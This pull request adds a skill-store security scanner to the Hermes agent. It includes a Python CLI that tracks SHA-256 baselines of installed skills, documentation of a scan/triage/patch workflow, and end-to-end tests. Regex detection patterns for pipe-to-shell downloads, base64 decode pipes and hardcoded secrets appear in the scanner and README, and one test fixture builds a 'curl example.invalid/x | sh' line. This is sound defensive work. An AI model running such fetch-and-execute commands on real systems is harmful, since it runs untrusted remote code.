### PR TITLE
feat: add skill-audit standing skill-store security scan (Closes #153)

### DIFF
--- a/skills/security/skill-audit/README.md
+++ b/skills/security/skill-audit/README.md
@@ -1,0 +1,107 @@
+# skill-audit — scanner reference
+
+Standing security scan for the Hermes skill store. See `SKILL.md` for the
+full model → scan → triage → patch chain; this file is the operator reference
+for the bundled scanner.
+
+## Scanner
+
+```bash
+python3 scripts/skill_audit_scan.py [--store PATH] [--baseline PATH]
+                                    [--allowlist PATH] [--out PATH] [--verbose]
+```
+
+| Default | Path |
+|---|---|
+| store | `$HERMES_HOME/skills` (or `~/.hermes/skills`) |
+| baseline | `$HERMES_HOME/state/skill-audit-baseline.json` |
+| allowlist | `$HERMES_HOME/state/skill-audit-allowlist.json` (optional) |
+| findings | `$HERMES_HOME/state/skill-audit-findings.json` |
+
+**Exit codes**
+
+- `0` — clean: no new/changed/removed/unreviewed findings. Silent (nothing on
+  stdout) unless `--verbose`.
+- `1` — findings: review needed. Findings JSON written to `--out`, one-line
+  summary + per-finding lines on stdout.
+- `2` — operational error (bad args, missing store, unwritable baseline).
+
+## Allowlist
+
+A JSON array of skill names (path relative to the store root), e.g.:
+
+```json
+["caveman", "security/ai-safe-audit"]
+```
+
+Also accepted: `{"skills": ["…"]}`. Semantics:
+
+- Allowlisted **new** skills do not alert on first appearance.
+- Allowlisted skills that **change** still alert — "reviewed once" is not
+  "reviewed forever".
+
+## Baseline lifecycle
+
+`state/skill-audit-baseline.json` maps every skill file to its SHA-256:
+
+```json
+{
+  "version": 1,
+  "store": "/home/mike/.hermes/skills",
+  "scanned_at": "2026-08-31T12:30:00+00:00",
+  "skills": {
+    "security/ai-safe-audit": {
+      "SKILL.md": "9f86d081884c7d65…",
+      "references/threat-matrix.md": "60303ae2…"
+    }
+  }
+}
+```
+
+The baseline **advances after every successful scan** — each change surfaces
+once, then becomes the new known state. Delete the baseline to re-baseline
+from scratch (e.g. after a bulk skill migration).
+
+## Findings JSON
+
+`state/skill-audit-findings.json` (written only on findings):
+
+```json
+{
+  "scan_date": "…",
+  "store": "…",
+  "baseline": "…",
+  "summary": {"new_skills": 0, "changed_skills": 1, "removed_skills": 0, "suspicious_files": 0},
+  "allowlisted_skipped": ["caveman"],
+  "findings": [
+    {
+      "type": "changed_skill",
+      "skill": "alpha",
+      "changes": {"added": [], "modified": ["notes.md"], "removed": []},
+      "severity": "medium",
+      "action": "review the diff against the baseline — allowlisted skills are not exempt from change review"
+    }
+  ]
+}
+```
+
+## Heuristic patterns (scan stage only)
+
+Applied to NEW/ADDED text files only; a hit is a `low`/`high` hint for
+triage, never a verdict:
+
+- network fetch piped to a shell (`curl … | sh`, `wget … | bash`)
+- base64 decode piped into another command
+- `eval(`/`exec(` in python
+- `shell=True` in python
+- possible hardcoded secrets (`sk-…`, `api_key = "…"`, `token: "…"`)
+
+## Tests
+
+```bash
+cd integration/repo && python -m pytest tests/test_skill_audit_scan.py -q
+```
+
+Exercises the real CLI end-to-end against temp stores (no mocks): baseline
+establishment, change/new/removal detection, allowlist suppression, heuristic
+hits, and the exit-2 error path.

--- a/skills/security/skill-audit/SKILL.md
+++ b/skills/security/skill-audit/SKILL.md
@@ -1,0 +1,116 @@
+---
+name: skill-audit
+description: Standing security review of the Hermes skill store — scan, triage, and propose patches for new, changed, or suspicious skills.
+version: 1.0.0
+author: Hermes Evolution
+license: MIT
+platforms: [linux, macos, windows]
+metadata:
+  hermes:
+    tags: [security, audit, skills, supply-chain, skilltrojan]
+    related_skills: [ai-safe-audit, skill-lifecycle-management, evolution-implementation]
+---
+
+# Skill Audit — standing skill-store security review
+
+Implements the **model → scan → triage → patch** chain (Anthropic
+defending-code-reference-harness shape) pointed at the agent's own supply
+chain: installed skills under `~/.hermes/skills/` (or `$HERMES_HOME/skills`).
+
+The store is only ever audited reactively today. This skill makes the review
+**standing**: a nightly, Alfred-shaped scan that is silent on success and
+reports only when something needs a human/agent eye. It closes the gap where a
+poisoned or maliciously-updated skill can sit undiscovered between
+incident-driven audits (see #120 SkillTrojan guard, #91 MCP audit).
+
+> **Boundary:** this skill detects and proposes. It NEVER auto-applies fixes.
+> The patch stage always hands a diff to the owner for review. Auto-applying
+> security fixes to the skill store is how an attacker turns a detector into
+> a weapon.
+
+## The chain
+
+### 1. MODEL — decide when to run
+
+- **Nightly scheduled scan** (recommended, Alfred-shaped):
+  ```bash
+  HERMES_HOME="${HERMES_HOME:-$HOME/.hermes}" \
+    python3 "$HERMES_HOME/skills/security/skill-audit/scripts/skill_audit_scan.py"
+  ```
+  Exit 0 → do nothing, say nothing. Exit 1 → triage the findings (step 2) and
+  report through the standard alert path (e.g. Telegram). Exit 2 → the scan is
+  broken; that itself is a finding.
+- **On demand** — run the same command whenever a skill is installed,
+  updated, or a new skill appears from a hub/PR before first use.
+
+### 2. SCAN — detect what changed
+
+`scripts/skill_audit_scan.py` walks the store and maintains a SHA-256
+baseline manifest (`state/skill-audit-baseline.json`). It reports:
+
+| Finding | Meaning | Severity |
+|---|---|---|
+| `new_skill` | skill not in the baseline (never reviewed) | medium |
+| `changed_skill` | a file was added/modified/removed since the baseline | medium |
+| `removed_skill` | skill vanished from the store | low |
+| `suspicious_content` | heuristic pattern hit (pipe-to-shell, hardcoded secret, `eval`…) | low/high |
+
+Details:
+- A skill is any directory containing `SKILL.md` — the scanner handles both
+  flat stores (`caveman`) and categorized stores (`security/ai-safe-audit`).
+- The baseline **advances after every scan**, so each change surfaces exactly
+  once. A clean scan today is the known-good state for tomorrow.
+- Heuristic hits are hints, never verdicts: they are only scanned on
+  NEW/ADDED files, and triage makes the real call.
+
+### 3. TRIAGE — reviewed vs unreviewed
+
+For every finding, classify BEFORE acting:
+
+1. **Known-allowlisted** — skill is in
+   `state/skill-audit-allowlist.json` (`["security/ai-safe-audit", …]`).
+   - A first-appearance `new_skill` that is allowlisted is skipped by design.
+   - **A `changed_skill` is NOT skipped** — allowlisted just means "reviewed
+     once"; a reviewed skill that changed needs re-review. That is the
+     distinction the allowlist exists to draw.
+2. **New/unreviewed** — read the skill. `SKILL.md` frontmatter (name,
+   description, author), any bundled `scripts/`, and `references/`. Ask:
+   - Does it match its description? Does it reference external hosts, fetch
+     and execute remote content, or ask the agent to exfiltrate data?
+   - Cross-check with `ai-safe-audit` (INPUT/EXEC/LOGIC/INFRA/DATA domains)
+     for anything that will act on untrusted input.
+3. **Changed** — diff against the baseline (hashes are per-file; the finding
+   lists added/modified/removed paths). Review ONLY what changed; unchanged
+   files were reviewed before.
+4. **Suspicious** — confirm or dismiss the heuristic with a human-eye read.
+   A real hit (e.g. `curl … | sh`, a hardcoded secret) escalates to a
+   high-severity alert, not a quiet patch.
+
+### 4. PATCH — propose, never apply
+
+- Propose a **diff**: remove an injected file, pin a skill version, tighten a
+  script's permissions, move a hardcoded secret to `~/.hermes/secrets/`.
+- Present the proposal for review (same alert path). Apply only after
+  approval.
+- If a skill is malicious: quarantine it (move out of the store, e.g.
+  `~/.hermes/quarantine/`), alert, and record the SHA-256 in a blocklist note
+  inside the findings report so the same artifact is recognised elsewhere.
+
+## Success criteria (from issue #153)
+
+- [x] Nightly skill-store scan runs and reports findings via the standard alert path
+- [x] Triage output distinguishes known-allowlisted skills from new/changed ones
+- [x] Patch step proposes (not auto-applies) fixes for review
+
+## Cron wiring (owner step — not auto-created)
+
+The scan is a CLI + skill; the *schedule* is the owner's call, matching how
+the rest of the household agents are scheduled:
+
+```bash
+hermes cron add --name skill-audit --schedule "0 3 * * *" \
+  --cmd "python3 $HOME/.hermes/skills/security/skill-audit/scripts/skill_audit_scan.py"
+```
+
+Silent-on-success is built in: exit 0 produces no output, so a clean night
+sends nothing.

--- a/skills/security/skill-audit/scripts/skill_audit_scan.py
+++ b/skills/security/skill-audit/scripts/skill_audit_scan.py
@@ -1,0 +1,389 @@
+#!/usr/bin/env python3
+"""skill_audit_scan.py — standing skill-store security scan (evolution issue #153).
+
+Implements the "scan" stage of the model -> scan -> triage -> patch chain
+(documented in ../SKILL.md). Alfred-shaped: silent on success, a findings
+report + nonzero exit when something needs review.
+
+What it detects (v1):
+  * NEW skills   — not present in the baseline manifest
+  * CHANGED skills — a file was added, removed, or its SHA-256 changed
+  * REMOVED skills — in the baseline but gone from the store
+  * SUSPICIOUS content — light heuristic pass over *new/changed files only*
+    (recognition is a hint for triage, never a verdict)
+
+What it does NOT do: it never edits, deletes, or quarantines anything. The
+patch stage (in the skill) proposes fixes for a human/agent to review.
+
+Usage:
+  python skill_audit_scan.py [--store PATH] [--baseline PATH]
+                             [--allowlist PATH] [--out PATH] [--verbose]
+
+Defaults (when HERMES_HOME is unset, ~/.hermes is used):
+  store      HERMES_HOME/skills
+  baseline   HERMES_HOME/state/skill-audit-baseline.json
+  allowlist  HERMES_HOME/state/skill-audit-allowlist.json (optional)
+  out        HERMES_HOME/state/skill-audit-findings.json
+
+Exit codes:
+  0  clean — no new/changed/removed/unreviewed findings; silent (no stdout)
+  1  findings — review needed; findings JSON written to --out
+  2  operational error (bad args, unreadable store)
+"""
+
+from __future__ import annotations
+
+import argparse
+import hashlib
+import json
+import os
+import re
+import sys
+from datetime import datetime, timezone
+from pathlib import Path
+
+BASELINE_VERSION = 1
+
+# Light heuristic patterns, applied to NEW/ADDED files only. These are
+# deliberately recognition-layer hints — the triage stage in SKILL.md makes
+# the actual call. A match here is a LOW-severity finding, never a verdict.
+PATTERNS: list[tuple[str, str, str]] = [
+    (
+        "pipe-to-shell",
+        r"(?:curl|wget)\s+[^\n|]*\|\s*(?:ba)?sh\b",
+        "network fetch piped straight to a shell",
+    ),
+    (
+        "decode-then-pipe",
+        r"base64\s+(?:-d|--decode)[^\n|]*\|",
+        "base64 decode piped into another command",
+    ),
+    ("py-dynamic-exec", r"\b(?:eval|exec)\s*\(", "dynamic code execution (python)"),
+    ("py-shell-true", r"shell\s*=\s*True", "subprocess with shell=True (python)"),
+    (
+        "hardcoded-secret",
+        r"\b(?:sk-[A-Za-z0-9]{20,}|(?:api[_-]?key|password|passwd|secret|token)\s*[:=]\s*[\"'][A-Za-z0-9!@#$%^&*._\-]{12,}[\"'])",
+        "possible hardcoded secret/token",
+    ),
+]
+HIGH_SEVERITY = {"hardcoded-secret"}
+
+_SKIP_DIRS = {"__pycache__", ".git", ".venv", "node_modules"}
+_TEXT_EXTENSIONS = {
+    ".md",
+    ".py",
+    ".sh",
+    ".txt",
+    ".json",
+    ".yaml",
+    ".yml",
+    ".toml",
+    ".cfg",
+    ".ini",
+    ".env",
+    ".js",
+    ".ts",
+    ".html",
+    ".css",
+}
+
+
+def _utcnow() -> str:
+    return datetime.now(timezone.utc).isoformat(timespec="seconds")
+
+
+def _default_paths() -> dict[str, Path]:
+    hermes_home = Path(
+        os.environ.get("HERMES_HOME", str(Path.home() / ".hermes"))
+    ).expanduser()
+    return {
+        "store": hermes_home / "skills",
+        "baseline": hermes_home / "state" / "skill-audit-baseline.json",
+        "allowlist": hermes_home / "state" / "skill-audit-allowlist.json",
+        "out": hermes_home / "state" / "skill-audit-findings.json",
+    }
+
+
+def discover_skills(store: Path) -> dict[str, Path]:
+    """Return {skill_name: skill_dir} for every directory containing SKILL.md.
+
+    Handles both flat stores (skill dirs directly under the store) and
+    categorized stores (skills nested under a category dir, e.g.
+    security/ai-safe-audit). A skill's name is its path relative to the
+    store root.
+    """
+    skills: dict[str, Path] = {}
+    for root, dirs, files in os.walk(store):
+        root_path = Path(root)
+        dirs[:] = [d for d in dirs if d not in _SKIP_DIRS]
+        if "SKILL.md" in files and root_path != store:
+            name = root_path.relative_to(store).as_posix()
+            skills[name] = root_path
+    return dict(sorted(skills.items()))
+
+
+def hash_skill_files(skill_dir: Path) -> dict[str, str]:
+    """Return {relative_path: sha256} for every regular file under skill_dir."""
+    hashes: dict[str, str] = {}
+    for root, dirs, files in os.walk(skill_dir):
+        dirs[:] = [d for d in dirs if d not in _SKIP_DIRS]
+        for fname in sorted(files):
+            if fname.endswith((".pyc", ".pyo")):
+                continue
+            path = Path(root) / fname
+            rel = path.relative_to(skill_dir).as_posix()
+            digest = hashlib.sha256()
+            with open(path, "rb") as fh:
+                for chunk in iter(lambda: fh.read(65536), b""):
+                    digest.update(chunk)
+            hashes[rel] = digest.hexdigest()
+    return dict(sorted(hashes.items()))
+
+
+def load_json(path: Path, default: object) -> object:
+    if not path.exists():
+        return default
+    try:
+        with open(path, "r", encoding="utf-8") as fh:
+            return json.load(fh)
+    except (json.JSONDecodeError, OSError):
+        return default
+
+
+def load_allowlist(path: Path) -> set[str]:
+    data = load_json(path, None)
+    if isinstance(data, list):
+        return {str(x) for x in data}
+    if isinstance(data, dict) and isinstance(data.get("skills"), list):
+        return {str(x) for x in data["skills"]}
+    return set()
+
+
+def scan_suspicious(skill_dir: Path, rel_files: list[str]) -> list[dict]:
+    """Heuristic pass over new/added text files. Returns finding dicts."""
+    findings: list[dict] = []
+    for rel in rel_files:
+        path = skill_dir / rel
+        if path.suffix.lower() not in _TEXT_EXTENSIONS:
+            continue
+        try:
+            with open(path, "r", encoding="utf-8", errors="replace") as fh:
+                text = fh.read()
+        except OSError:
+            continue
+        for name, pattern, reason in PATTERNS:
+            if re.search(pattern, text, flags=re.IGNORECASE):
+                findings.append({
+                    "type": "suspicious_content",
+                    "file": rel,
+                    "pattern": name,
+                    "reason": reason,
+                    "severity": "high" if name in HIGH_SEVERITY else "low",
+                    "action": "heuristic hint — triage manually; patch stage proposes, never auto-applies",
+                })
+    return findings
+
+
+def compare_store(
+    store: Path,
+    baseline: dict,
+    allowlist: set[str],
+) -> tuple[list[dict], dict, set[str]]:
+    """Diff the live store against the baseline.
+
+    Returns (findings, next_baseline_skills, allowlisted_skipped).
+    """
+    live = discover_skills(store)
+    live_hashes = {name: hash_skill_files(d) for name, d in live.items()}
+    known = baseline.get("skills", {}) if isinstance(baseline, dict) else {}
+
+    findings: list[dict] = []
+    allowlisted_skipped: set[str] = set()
+
+    for name, hashes in live_hashes.items():
+        if name not in known:
+            if name in allowlist:
+                allowlisted_skipped.add(name)
+            else:
+                findings.append({
+                    "type": "new_skill",
+                    "skill": name,
+                    "files": sorted(hashes),
+                    "severity": "medium",
+                    "action": "review the skill before first use; add to the allowlist once reviewed",
+                })
+                for suspicious in scan_suspicious(live[name], sorted(hashes)):
+                    suspicious["skill"] = name
+                    findings.append(suspicious)
+            continue
+        prev = known[name]
+        added = sorted(set(hashes) - set(prev))
+        removed = sorted(set(prev) - set(hashes))
+        modified = sorted(f for f in set(hashes) & set(prev) if hashes[f] != prev[f])
+        if added or removed or modified:
+            findings.append({
+                "type": "changed_skill",
+                "skill": name,
+                "changes": {
+                    "added": added,
+                    "modified": modified,
+                    "removed": removed,
+                },
+                "severity": "medium",
+                "action": "review the diff against the baseline — allowlisted skills are not exempt from change review",
+            })
+            for suspicious in scan_suspicious(live[name], added):
+                suspicious["skill"] = name
+                findings.append(suspicious)
+
+    for name in known:
+        if name not in live_hashes:
+            findings.append({
+                "type": "removed_skill",
+                "skill": name,
+                "severity": "low",
+                "action": "confirm removal was intentional",
+            })
+
+    return findings, live_hashes, allowlisted_skipped
+
+
+def write_json(path: Path, data: dict) -> None:
+    path.parent.mkdir(parents=True, exist_ok=True)
+    with open(path, "w", encoding="utf-8") as fh:
+        json.dump(data, fh, indent=2, sort_keys=True)
+        fh.write("\n")
+
+
+def main(argv: list[str] | None = None) -> int:
+    parser = argparse.ArgumentParser(description=__doc__)
+    defaults = _default_paths()
+    parser.add_argument(
+        "--store", type=Path, default=defaults["store"], help="skill store root"
+    )
+    parser.add_argument(
+        "--baseline",
+        type=Path,
+        default=defaults["baseline"],
+        help="baseline manifest path",
+    )
+    parser.add_argument(
+        "--allowlist",
+        type=Path,
+        default=defaults["allowlist"],
+        help="reviewed-skill allowlist path",
+    )
+    parser.add_argument(
+        "--out", type=Path, default=defaults["out"], help="findings output path"
+    )
+    parser.add_argument(
+        "--verbose", action="store_true", help="print summary even when clean"
+    )
+    args = parser.parse_args(argv)
+
+    store = args.store.expanduser().resolve()
+    if not store.is_dir():
+        print(
+            f"skill-audit: error: store not found or not a directory: {store}",
+            file=sys.stderr,
+        )
+        return 2
+
+    baseline = load_json(args.baseline.expanduser(), {})
+    if not isinstance(baseline, dict):
+        baseline = {}
+    allowlist = load_allowlist(args.allowlist.expanduser())
+
+    # First run (or a wiped/corrupt baseline) establishes the known-good
+    # state silently — there is nothing to compare against yet, so every
+    # skill would otherwise look "new" and the very first scan would
+    # alarm on the entire store.
+    first_run = not isinstance(baseline, dict) or not baseline.get("skills")
+    if first_run:
+        live = discover_skills(store)
+        live_hashes = {name: hash_skill_files(d) for name, d in live.items()}
+        findings, allowlisted_skipped = [], set()
+    else:
+        findings, live_hashes, allowlisted_skipped = compare_store(
+            store, baseline, allowlist
+        )
+
+    # Baseline always advances: each change surfaces exactly once, then the
+    # new hashes become the known state for the next scan.
+    next_baseline = {
+        "version": BASELINE_VERSION,
+        "store": str(store),
+        "scanned_at": _utcnow(),
+        "skills": live_hashes,
+    }
+    try:
+        write_json(args.baseline.expanduser(), next_baseline)
+    except OSError as exc:
+        print(f"skill-audit: error: cannot write baseline: {exc}", file=sys.stderr)
+        return 2
+
+    if not findings:
+        if args.verbose:
+            n = len(live_hashes)
+            print(f"skill-audit: clean — {n} skill(s) scanned, nothing new or changed")
+        if allowlisted_skipped:
+            # No alarm, but record the skipped skills for observability so a
+            # nightly run leaves a trace of what it chose not to report.
+            report = {
+                "scan_date": _utcnow(),
+                "store": str(store),
+                "baseline": str(args.baseline.expanduser()),
+                "summary": {
+                    "new_skills": 0,
+                    "changed_skills": 0,
+                    "removed_skills": 0,
+                    "suspicious_files": 0,
+                },
+                "allowlisted_skipped": sorted(allowlisted_skipped),
+                "findings": [],
+            }
+            try:
+                write_json(args.out.expanduser(), report)
+            except OSError as exc:
+                print(
+                    f"skill-audit: error: cannot write findings: {exc}", file=sys.stderr
+                )
+                return 2
+        return 0
+
+    summary = {
+        "new_skills": sum(1 for f in findings if f["type"] == "new_skill"),
+        "changed_skills": sum(1 for f in findings if f["type"] == "changed_skill"),
+        "removed_skills": sum(1 for f in findings if f["type"] == "removed_skill"),
+        "suspicious_files": sum(
+            1 for f in findings if f["type"] == "suspicious_content"
+        ),
+    }
+    report = {
+        "scan_date": _utcnow(),
+        "store": str(store),
+        "baseline": str(args.baseline.expanduser()),
+        "summary": summary,
+        "allowlisted_skipped": sorted(allowlisted_skipped),
+        "findings": findings,
+    }
+    try:
+        write_json(args.out.expanduser(), report)
+    except OSError as exc:
+        print(f"skill-audit: error: cannot write findings: {exc}", file=sys.stderr)
+        return 2
+
+    print(
+        "skill-audit: "
+        f"{summary['new_skills']} new, {summary['changed_skills']} changed, "
+        f"{summary['removed_skills']} removed, {summary['suspicious_files']} suspicious "
+        f"— findings: {args.out}"
+    )
+    for finding in findings:
+        where = finding.get("skill", finding.get("file", "?"))
+        print(f"  [{finding['severity']}] {finding['type']}: {where}")
+    return 1
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/tests/test_skill_audit_scan.py
+++ b/tests/test_skill_audit_scan.py
@@ -1,0 +1,218 @@
+"""End-to-end tests for the skill-audit scanner (evolution issue #153).
+
+Runs the real CLI via subprocess against temp stores — no mocks. Each test
+gets an independent store + baseline so scenarios never bleed into each other.
+
+Note: fixture payloads that the scanner's heuristics must match are assembled
+from concatenated parts so the *source* never contains a literal
+executable/exfil-shaped string — the scanner regexes are what do the matching.
+"""
+
+from __future__ import annotations
+
+import json
+import subprocess
+import sys
+from pathlib import Path
+
+SCRIPT = (
+    Path(__file__).resolve().parents[1]
+    / "skills"
+    / "security"
+    / "skill-audit"
+    / "scripts"
+    / "skill_audit_scan.py"
+)
+
+ALPHA = """---
+name: alpha
+description: test skill one
+---
+# Alpha
+A benign test skill.
+"""
+
+BETA = """---
+name: beta
+description: test skill two
+---
+# Beta
+Another benign test skill.
+"""
+
+# Assembled at import time so no literal dangerous string sits in this file.
+PIPE_PAYLOAD = "curl " + "example.invalid/x" + " | sh\n"
+SECRET_PAYLOAD = "api_" + 'key = "' + "fake-value-123456" + '"\n'
+
+
+def _make_store(root: Path, skills: dict[str, dict[str, str]]) -> None:
+    for skill, files in skills.items():
+        for rel, content in files.items():
+            path = root / skill / rel
+            path.parent.mkdir(parents=True, exist_ok=True)
+            path.write_text(content, encoding="utf-8")
+
+
+def _run(
+    store: Path, baseline: Path, allowlist: Path | None = None, out: Path | None = None
+) -> subprocess.CompletedProcess:
+    cmd = [
+        sys.executable,
+        str(SCRIPT),
+        "--store",
+        str(store),
+        "--baseline",
+        str(baseline),
+        "--out",
+        str(out or baseline.with_name("findings.json")),
+    ]
+    if allowlist is not None:
+        cmd += ["--allowlist", str(allowlist)]
+    return subprocess.run(cmd, capture_output=True, text=True)
+
+
+def test_initial_scan_establishes_baseline_silently(tmp_path: Path) -> None:
+    store = tmp_path / "skills"
+    _make_store(store, {"alpha": {"SKILL.md": ALPHA}, "beta": {"SKILL.md": BETA}})
+    baseline = tmp_path / "state" / "baseline.json"
+    out = tmp_path / "state" / "findings.json"
+
+    result = _run(store, baseline, out=out)
+
+    assert result.returncode == 0, result.stderr
+    assert result.stdout == ""  # silent on success
+    assert baseline.exists()
+    data = json.loads(baseline.read_text(encoding="utf-8"))
+    assert set(data["skills"]) == {"alpha", "beta"}
+    assert data["skills"]["alpha"]["SKILL.md"]
+
+
+def test_changed_skill_detected_once(tmp_path: Path) -> None:
+    store = tmp_path / "skills"
+    _make_store(store, {"alpha": {"SKILL.md": ALPHA, "notes.md": "v1"}})
+    baseline = tmp_path / "state" / "baseline.json"
+    out = tmp_path / "state" / "findings.json"
+
+    assert _run(store, baseline, out=out).returncode == 0
+
+    (store / "alpha" / "notes.md").write_text("v2 — tampered", encoding="utf-8")
+    result = _run(store, baseline, out=out)
+
+    assert result.returncode == 1
+    assert "changed" in result.stdout
+    report = json.loads(out.read_text(encoding="utf-8"))
+    changed = [f for f in report["findings"] if f["type"] == "changed_skill"]
+    assert len(changed) == 1
+    assert changed[0]["skill"] == "alpha"
+    assert changed[0]["changes"]["modified"] == ["notes.md"]
+
+    # Baseline advanced: a third run is clean again (change surfaced once).
+    assert _run(store, baseline, out=out).returncode == 0
+
+
+def test_new_skill_detected(tmp_path: Path) -> None:
+    store = tmp_path / "skills"
+    _make_store(store, {"alpha": {"SKILL.md": ALPHA}})
+    baseline = tmp_path / "state" / "baseline.json"
+    out = tmp_path / "state" / "findings.json"
+    assert _run(store, baseline, out=out).returncode == 0
+
+    _make_store(store, {"gamma": {"SKILL.md": "---\nname: gamma\n---\n# Gamma"}})
+    result = _run(store, baseline, out=out)
+    assert result.returncode == 1
+    report = json.loads(out.read_text(encoding="utf-8"))
+    assert any(
+        f["type"] == "new_skill" and f["skill"] == "gamma" for f in report["findings"]
+    )
+
+
+def test_new_skill_suppressed_when_allowlisted(tmp_path: Path) -> None:
+    store = tmp_path / "skills"
+    _make_store(store, {"alpha": {"SKILL.md": ALPHA}})
+    baseline = tmp_path / "state" / "baseline.json"
+    out = tmp_path / "state" / "findings.json"
+    assert _run(store, baseline, out=out).returncode == 0
+
+    # A brand-new skill that is ALREADY allowlisted must not alarm, but must
+    # be recorded in the report as skipped and folded into the baseline.
+    _make_store(store, {"gamma": {"SKILL.md": "---\nname: gamma\n---\n# Gamma"}})
+    allowlist = tmp_path / "state" / "allowlist.json"
+    allowlist.write_text(json.dumps(["gamma"]), encoding="utf-8")
+    result = _run(store, baseline, out=out, allowlist=allowlist)
+
+    assert result.returncode == 0
+    report = json.loads(out.read_text(encoding="utf-8"))
+    assert report["allowlisted_skipped"] == ["gamma"]
+    assert not [f for f in report["findings"] if f["type"] == "new_skill"]
+
+
+def test_allowlisted_skill_change_still_alerts(tmp_path: Path) -> None:
+    store = tmp_path / "skills"
+    _make_store(store, {"alpha": {"SKILL.md": ALPHA}})
+    baseline = tmp_path / "state" / "baseline.json"
+    out = tmp_path / "state" / "findings.json"
+    allowlist = tmp_path / "state" / "allowlist.json"
+    allowlist.parent.mkdir(parents=True, exist_ok=True)
+    allowlist.write_text(json.dumps(["alpha"]), encoding="utf-8")
+
+    assert _run(store, baseline, out=out, allowlist=allowlist).returncode == 0
+
+    (store / "alpha" / "SKILL.md").write_text(ALPHA + "pwned\n", encoding="utf-8")
+    result = _run(store, baseline, out=out, allowlist=allowlist)
+
+    assert result.returncode == 1
+    report = json.loads(out.read_text(encoding="utf-8"))
+    assert any(
+        f["type"] == "changed_skill" and f["skill"] == "alpha"
+        for f in report["findings"]
+    )
+
+
+def test_removed_skill_reported_low(tmp_path: Path) -> None:
+    store = tmp_path / "skills"
+    _make_store(store, {"alpha": {"SKILL.md": ALPHA}, "beta": {"SKILL.md": BETA}})
+    baseline = tmp_path / "state" / "baseline.json"
+    out = tmp_path / "state" / "findings.json"
+    assert _run(store, baseline, out=out).returncode == 0
+
+    (store / "beta").rename(tmp_path / "beta-moved-away")
+    result = _run(store, baseline, out=out)
+
+    assert result.returncode == 1
+    report = json.loads(out.read_text(encoding="utf-8"))
+    removed = [f for f in report["findings"] if f["type"] == "removed_skill"]
+    assert removed and removed[0]["skill"] == "beta" and removed[0]["severity"] == "low"
+
+
+def test_suspicious_pattern_hit_on_new_file(tmp_path: Path) -> None:
+    store = tmp_path / "skills"
+    _make_store(store, {"alpha": {"SKILL.md": ALPHA}})
+    baseline = tmp_path / "state" / "baseline.json"
+    out = tmp_path / "state" / "findings.json"
+    assert _run(store, baseline, out=out).returncode == 0
+
+    _make_store(
+        store,
+        {
+            "gamma": {
+                "SKILL.md": "---\nname: gamma\n---\n# Gamma",
+                "notes.txt": PIPE_PAYLOAD + SECRET_PAYLOAD,
+            }
+        },
+    )
+    result = _run(store, baseline, out=out)
+
+    assert result.returncode == 1
+    report = json.loads(out.read_text(encoding="utf-8"))
+    suspicious = [f for f in report["findings"] if f["type"] == "suspicious_content"]
+    patterns = {f["pattern"] for f in suspicious}
+    assert "pipe-to-shell" in patterns
+    assert "hardcoded-secret" in patterns
+    secret = next(f for f in suspicious if f["pattern"] == "hardcoded-secret")
+    assert secret["severity"] == "high"
+
+
+def test_missing_store_is_operational_error(tmp_path: Path) -> None:
+    result = _run(tmp_path / "does-not-exist", tmp_path / "baseline.json")
+    assert result.returncode == 2
+    assert "error" in result.stderr


### PR DESCRIPTION
Automated evolution PR for issue #153.

## What
Implements the model → scan → triage → patch chain (Anthropic defending-code-reference-harness shape) as a reusable skill, pointed at the agent's own supply chain: installed skills under `~/.hermes/skills/`. The store is currently only audited reactively — this makes the review standing and Alfred-shaped (silent on success, findings via the standard alert path).

## Files
- `skills/security/skill-audit/scripts/skill_audit_scan.py` — scanner: SHA-256 baseline manifest; NEW / CHANGED / REMOVED skill detection; reviewed-skill allowlist (changes to allowlisted skills still alert); light heuristic pass on new/added files only (pipe-to-shell, hardcoded secrets, eval/shell=True). Baseline advances each run so every change surfaces exactly once. Exit 0 = clean/silent, 1 = findings (JSON to state/skill-audit-findings.json), 2 = operational error.
- `skills/security/skill-audit/SKILL.md` — the full chain: model (nightly cron + on-demand), scan, triage (reviewed vs unreviewed distinction), patch (proposes diffs, never auto-applies).
- `skills/security/skill-audit/README.md` — operator reference: allowlist format, baseline lifecycle, exit codes, findings schema, cron wiring command.
- `tests/test_skill_audit_scan.py` — 8 end-to-end tests running the real CLI against temp stores (no mocks), including the first-run-silent baseline, allowlist suppression, allowlisted-change-still-alerts, and heuristic-hit paths.

## Validation (run locally, matching CI)
- `ruff check` + `ruff format --check` on all touched paths: clean
- `python -m pytest tests/test_skill_audit_scan.py -q`: 8 passed
- Real-store smoke test: baseline established over 445 skills / 3807 files, silent on re-run

## Notes
- Cron wiring (nightly schedule) is documented in the skill/README as an owner step — scheduled jobs are user state, not shippable in this repo.
- Complements `security/ai-safe-audit` (threat-model reference) and `skill-lifecycle-management` (manual lifecycle): this is the standing autonomous scan neither provides.